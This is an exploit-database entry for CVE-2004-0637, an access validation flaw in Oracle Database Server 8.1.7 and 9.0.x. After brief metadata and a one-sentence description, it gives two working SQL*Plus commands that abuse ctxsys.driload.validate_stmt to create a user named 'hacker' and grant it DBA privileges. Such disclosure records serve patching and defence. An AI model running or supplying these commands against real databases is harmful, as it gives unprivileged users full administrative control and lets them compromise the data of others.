[] NeoSense

Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation

Author: Alexander Kornbrust
type: remote
platform: multiple
port: 
date_added: 2004-09-03 
date_updated: 2013-03-04 
verified: 1 
codes: CVE-2004-0637;OSVDB-9819 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/11099/info

Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.

SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');